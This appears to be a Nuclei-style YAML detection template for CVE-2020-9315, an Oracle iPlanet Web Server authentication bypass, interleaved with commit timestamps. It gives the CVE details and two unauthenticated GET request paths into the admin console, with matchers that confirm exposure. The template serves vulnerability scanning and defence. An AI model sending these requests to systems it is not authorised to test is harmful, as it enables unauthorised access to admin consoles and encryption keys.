2021-05-01 11:08:36 +00:00
id : CVE-2020-9315
info :
2022-06-27 18:20:12 +00:00
name : Oracle iPlanet Web Server 7.0.x - Authentication Bypass
2021-05-01 11:08:36 +00:00
author : dhiyaneshDk
severity : high
2022-06-28 03:22:21 +00:00
description : |
Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.
2022-04-22 10:38:41 +00:00
reference :
- https://www.cvebase.com/cve/2020/9315
2022-05-17 09:18:12 +00:00
- https://www.oracle.com/support/lifetime-support/
- https://www.oracle.com/us/assets/lifetime-support-middleware-069163.pdf
- https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
2022-06-27 18:20:12 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-9315
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-9315
cwe-id : CWE-306
2022-06-28 03:07:51 +00:00
tags : cve,cve2020,oracle,auth-bypass,iplanet
2021-05-01 11:08:36 +00:00
requests :
2021-05-02 11:37:30 +00:00
- method : GET
path :
- "{{BaseURL}}/admingui/version/serverTasksGeneral?serverTasksGeneral.GeneralWebserverTabs.TabHref=2"
- "{{BaseURL}}/admingui/version/serverConfigurationsGeneral?serverConfigurationsGeneral.GeneralWebserverTabs.TabHref=4"
2021-05-01 11:08:36 +00:00
2021-05-02 11:37:30 +00:00
matchers-condition : and
2021-05-01 11:08:36 +00:00
matchers :
2021-05-02 11:37:30 +00:00
- type : word
words :
- "Admin Console"
- type : word
words :
- "serverConfigurationsGeneral"
- "serverCertificatesGeneral"
condition : or
- type : status
2021-05-02 11:44:03 +00:00
status :
2022-06-27 18:20:12 +00:00
- 200
# Enhanced by mp on 2022/06/27